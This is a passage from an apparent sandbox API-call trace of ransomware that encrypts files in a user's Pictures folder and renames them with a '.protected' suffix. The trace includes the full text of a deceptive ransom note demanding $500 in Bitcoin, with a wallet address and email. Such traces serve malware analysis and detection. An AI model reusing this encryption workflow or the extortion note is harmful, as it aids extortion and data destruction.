lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.577] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.577] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.577] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.577] WriteFile (in: hFile=0xd4, 
lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.577] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0092.578] CloseHandle (hObject=0xd4) returned 1 [0092.578] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\W-ZqjcBjJJ3u4Dz_GIV.gif.protected") returned 96 [0092.578] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\W-ZqjcBjJJ3u4Dz_GIV.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qdnufsmeozg2hmfeolo\\w-zqjcbjjj3u4dz_giv.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\W-ZqjcBjJJ3u4Dz_GIV.gif.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qdnufsmeozg2hmfeolo\\w-zqjcbjjj3u4dz_giv.gif.protected")) returned 1 [0092.579] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.579] lstrcmpiW (lpString1="xYnnii.gif", lpString2="Windows") returned 1 [0092.579] lstrcmpiW (lpString1="xYnnii.gif", lpString2="Program Files") returned 1 [0092.579] lstrcmpiW (lpString1="xYnnii.gif", lpString2="Program Files (x86)") returned 1 [0092.579] lstrcmpiW (lpString1="xYnnii.gif", lpString2="$Recycle.bin") returned 1 [0092.579] lstrcmpiW (lpString1="xYnnii.gif", lpString2="System Volume Information") returned 1 [0092.579] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\xYnnii.gif") returned 73 [0092.579] StrStrIW (lpFirst="xYnnii.gif", lpSrch=".protected") returned 0x0 
[0092.579] lstrcmpW (lpString1="xYnnii.gif", lpString2="RESTORE_FILES.txt") returned 1 [0092.579] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.579] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.579] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\xYnnii.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qdnufsmeozg2hmfeolo\\xynnii.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.580] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\xYnnii.gif") returned 73 [0092.580] StrStrW (lpFirst="xYnnii.gif", lpSrch=".txt") returned 0x0 [0092.580] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\xYnnii.gif") returned 73 [0092.580] StrStrW (lpFirst="xYnnii.gif", lpSrch=".rar") returned 0x0 [0092.580] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\xYnnii.gif") returned 73 [0092.580] StrStrW (lpFirst="xYnnii.gif", lpSrch=".zip") returned 0x0 [0092.580] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0xc99, lpOverlapped=0x0) returned 1 [0092.580] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xfffff367, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.580] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xc99, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0xc99, lpOverlapped=0x0) returned 1 
[0092.581] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.581] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.581] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0092.581] CloseHandle (hObject=0xd4) returned 1 [0092.582] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\xYnnii.gif.protected") returned 83 [0092.582] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\xYnnii.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qdnufsmeozg2hmfeolo\\xynnii.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\xYnnii.gif.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qdnufsmeozg2hmfeolo\\xynnii.gif.protected")) returned 1 [0092.583] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0092.583] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0092.583] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\RESTORE_FILES.txt") returned 80 [0092.583] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qdnufsmeozg2hmfeolo\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.583] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0092.583] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0092.584] lstrlenA (lpString="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") returned 684 [0092.584] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, 
lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0092.584] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0092.584] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0092.584] CloseHandle (hObject=0xb4) returned 1 [0092.585] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.585] lstrcmpiW (lpString1="qmyA9xPizOU7v.png", lpString2="Windows") returned -1 [0092.585] lstrcmpiW (lpString1="qmyA9xPizOU7v.png", lpString2="Program Files") returned 1 [0092.585] lstrcmpiW (lpString1="qmyA9xPizOU7v.png", lpString2="Program Files (x86)") returned 1 [0092.585] lstrcmpiW (lpString1="qmyA9xPizOU7v.png", lpString2="$Recycle.bin") returned 1 [0092.585] lstrcmpiW (lpString1="qmyA9xPizOU7v.png", lpString2="System Volume Information") returned -1 [0092.585] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qmyA9xPizOU7v.png") returned 60 [0092.585] StrStrIW (lpFirst="qmyA9xPizOU7v.png", lpSrch=".protected") returned 0x0 [0092.585] lstrcmpW (lpString1="qmyA9xPizOU7v.png", lpString2="RESTORE_FILES.txt") returned -1 [0092.585] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.585] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.585] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qmyA9xPizOU7v.png" 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qmya9xpizou7v.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.586] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qmyA9xPizOU7v.png") returned 60 [0092.586] StrStrW (lpFirst="qmyA9xPizOU7v.png", lpSrch=".txt") returned 0x0 [0092.586] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qmyA9xPizOU7v.png") returned 60 [0092.586] StrStrW (lpFirst="qmyA9xPizOU7v.png", lpSrch=".rar") returned 0x0 [0092.586] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qmyA9xPizOU7v.png") returned 60 [0092.586] StrStrW (lpFirst="qmyA9xPizOU7v.png", lpSrch=".zip") returned 0x0 [0092.586] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.586] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.587] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.587] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.587] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.587] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, 
lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.587] CloseHandle (hObject=0xb4) returned 1 [0092.587] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qmyA9xPizOU7v.png.protected") returned 70 [0092.587] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qmyA9xPizOU7v.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qmya9xpizou7v.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qmyA9xPizOU7v.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qmya9xpizou7v.png.protected")) returned 1 [0092.588] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.588] lstrcmpiW (lpString1="VY8ECdNr.png", lpString2="Windows") returned -1 [0092.588] lstrcmpiW (lpString1="VY8ECdNr.png", lpString2="Program Files") returned 1 [0092.588] lstrcmpiW (lpString1="VY8ECdNr.png", lpString2="Program Files (x86)") returned 1 [0092.588] lstrcmpiW (lpString1="VY8ECdNr.png", lpString2="$Recycle.bin") returned 1 [0092.588] lstrcmpiW (lpString1="VY8ECdNr.png", lpString2="System Volume Information") returned 1 [0092.588] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VY8ECdNr.png") returned 55 [0092.588] StrStrIW (lpFirst="VY8ECdNr.png", lpSrch=".protected") returned 0x0 [0092.588] lstrcmpW (lpString1="VY8ECdNr.png", lpString2="RESTORE_FILES.txt") returned 1 [0092.588] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.588] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.588] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VY8ECdNr.png" 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vy8ecdnr.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.589] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VY8ECdNr.png") returned 55 [0092.589] StrStrW (lpFirst="VY8ECdNr.png", lpSrch=".txt") returned 0x0 [0092.589] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VY8ECdNr.png") returned 55 [0092.589] StrStrW (lpFirst="VY8ECdNr.png", lpSrch=".rar") returned 0x0 [0092.589] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VY8ECdNr.png") returned 55 [0092.589] StrStrW (lpFirst="VY8ECdNr.png", lpSrch=".zip") returned 0x0 [0092.589] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.590] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.590] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.590] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.590] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.590] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, 
lpOverlapped=0x0) returned 1 [0092.590] CloseHandle (hObject=0xb4) returned 1 [0092.590] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VY8ECdNr.png.protected") returned 65 [0092.590] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VY8ECdNr.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vy8ecdnr.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VY8ECdNr.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vy8ecdnr.png.protected")) returned 1 [0092.591] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.591] lstrcmpiW (lpString1="WXWBO0VxA_ gghD.jpg", lpString2="Windows") returned 1 [0092.591] lstrcmpiW (lpString1="WXWBO0VxA_ gghD.jpg", lpString2="Program Files") returned 1 [0092.591] lstrcmpiW (lpString1="WXWBO0VxA_ gghD.jpg", lpString2="Program Files (x86)") returned 1 [0092.591] lstrcmpiW (lpString1="WXWBO0VxA_ gghD.jpg", lpString2="$Recycle.bin") returned 1 [0092.591] lstrcmpiW (lpString1="WXWBO0VxA_ gghD.jpg", lpString2="System Volume Information") returned 1 [0092.591] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WXWBO0VxA_ gghD.jpg") returned 62 [0092.591] StrStrIW (lpFirst="WXWBO0VxA_ gghD.jpg", lpSrch=".protected") returned 0x0 [0092.591] lstrcmpW (lpString1="WXWBO0VxA_ gghD.jpg", lpString2="RESTORE_FILES.txt") returned 1 [0092.591] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.591] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.591] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WXWBO0VxA_ gghD.jpg" 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wxwbo0vxa_ gghd.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.592] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WXWBO0VxA_ gghD.jpg") returned 62 [0092.592] StrStrW (lpFirst="WXWBO0VxA_ gghD.jpg", lpSrch=".txt") returned 0x0 [0092.592] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WXWBO0VxA_ gghD.jpg") returned 62 [0092.592] StrStrW (lpFirst="WXWBO0VxA_ gghD.jpg", lpSrch=".rar") returned 0x0 [0092.592] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WXWBO0VxA_ gghD.jpg") returned 62 [0092.592] StrStrW (lpFirst="WXWBO0VxA_ gghD.jpg", lpSrch=".zip") returned 0x0 [0092.592] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.592] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.593] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.593] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.593] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.593] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, 
lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.593] CloseHandle (hObject=0xb4) returned 1 [0092.593] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WXWBO0VxA_ gghD.jpg.protected") returned 72 [0092.593] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WXWBO0VxA_ gghD.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wxwbo0vxa_ gghd.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WXWBO0VxA_ gghD.jpg.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wxwbo0vxa_ gghd.jpg.protected")) returned 1 [0092.594] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.594] lstrcmpiW (lpString1="Y9WcYG5aKLHTpDF6b92d.gif", lpString2="Windows") returned 1 [0092.594] lstrcmpiW (lpString1="Y9WcYG5aKLHTpDF6b92d.gif", lpString2="Program Files") returned 1 [0092.594] lstrcmpiW (lpString1="Y9WcYG5aKLHTpDF6b92d.gif", lpString2="Program Files (x86)") returned 1 [0092.594] lstrcmpiW (lpString1="Y9WcYG5aKLHTpDF6b92d.gif", lpString2="$Recycle.bin") returned 1 [0092.594] lstrcmpiW (lpString1="Y9WcYG5aKLHTpDF6b92d.gif", lpString2="System Volume Information") returned 1 [0092.594] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Y9WcYG5aKLHTpDF6b92d.gif") returned 67 [0092.594] StrStrIW (lpFirst="Y9WcYG5aKLHTpDF6b92d.gif", lpSrch=".protected") returned 0x0 [0092.594] lstrcmpW (lpString1="Y9WcYG5aKLHTpDF6b92d.gif", lpString2="RESTORE_FILES.txt") returned 1 [0092.594] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.594] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 
1 [0092.594] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Y9WcYG5aKLHTpDF6b92d.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\y9wcyg5aklhtpdf6b92d.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.595] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Y9WcYG5aKLHTpDF6b92d.gif") returned 67 [0092.595] StrStrW (lpFirst="Y9WcYG5aKLHTpDF6b92d.gif", lpSrch=".txt") returned 0x0 [0092.595] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Y9WcYG5aKLHTpDF6b92d.gif") returned 67 [0092.595] StrStrW (lpFirst="Y9WcYG5aKLHTpDF6b92d.gif", lpSrch=".rar") returned 0x0 [0092.595] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Y9WcYG5aKLHTpDF6b92d.gif") returned 67 [0092.595] StrStrW (lpFirst="Y9WcYG5aKLHTpDF6b92d.gif", lpSrch=".zip") returned 0x0 [0092.595] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x132e, lpOverlapped=0x0) returned 1 [0092.595] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffecd2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 